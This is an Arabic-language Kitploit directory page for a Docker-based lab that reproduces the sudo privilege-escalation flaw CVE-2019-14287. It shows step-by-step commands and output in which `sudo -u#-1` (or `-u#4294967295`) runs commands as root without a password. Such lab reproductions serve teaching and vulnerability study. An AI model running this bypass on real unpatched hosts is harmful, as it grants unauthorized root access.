Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
poc-cve-2019-14287 — PoC قائم على Docker يُظهر تصعيد صلاحيات sudo عبر CVE-2019-14287 عن طريق تجاوز تقييد مستخدم Runas، مع تعليمات إعادة الإنتاج خطوة بخطوة. | Kitploit
أدوات/GitHubGitHub/lemonadern/poc-cve-2019-14287
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليممختبرات وتدريب عملي
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

PoC قائم على Docker يُظهر تصعيد صلاحيات sudo عبر CVE-2019-14287 عن طريق تجاوز تقييد مستخدم Runas، مع تعليمات إعادة الإنتاج خطوة بخطوة.

عرض المستودع
14منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC of CVE-2019-14287

ملخص

هذا مثال لإعادة إنتاج ثغرة sudo (CVE-2019-14287) داخل حاوية Docker.

خطوات التمرين

  1. قم بتشغيل الحاوية باستخدام docker compose up -d
  2. ادخل إلى الحاوية باستخدام docker exec -it vulnerable_sudo_app bash
  3. قم بتشغيل whoami أو id لتأكيد أنك مستخدم عادي (ليس root)
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. تأكد من عدم القدرة على تشغيل sudo -u#0 whoami أو sudo -u#0 id -u
    • يتم تحديد uid (-u) بقيمة 0 (root)
    • يُطلب كلمة المرور، ولكنك لا تعرفها لذا لا يمكن التشغيل
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. قم بتشغيل sudo -u#-1 whoami أو sudo -u#-1 id -u لتأكيد إمكانية تشغيل الأوامر كـ root دون مصادقة (إعادة إنتاج الثغرة)
    • يمكن استخدام -u#4294967295 أيضًا بنفس الطريقة
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

المراجع

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • ملخص حول ثغرة sudo (CVE-2019-14287) - Qiita
تنزيل الأداة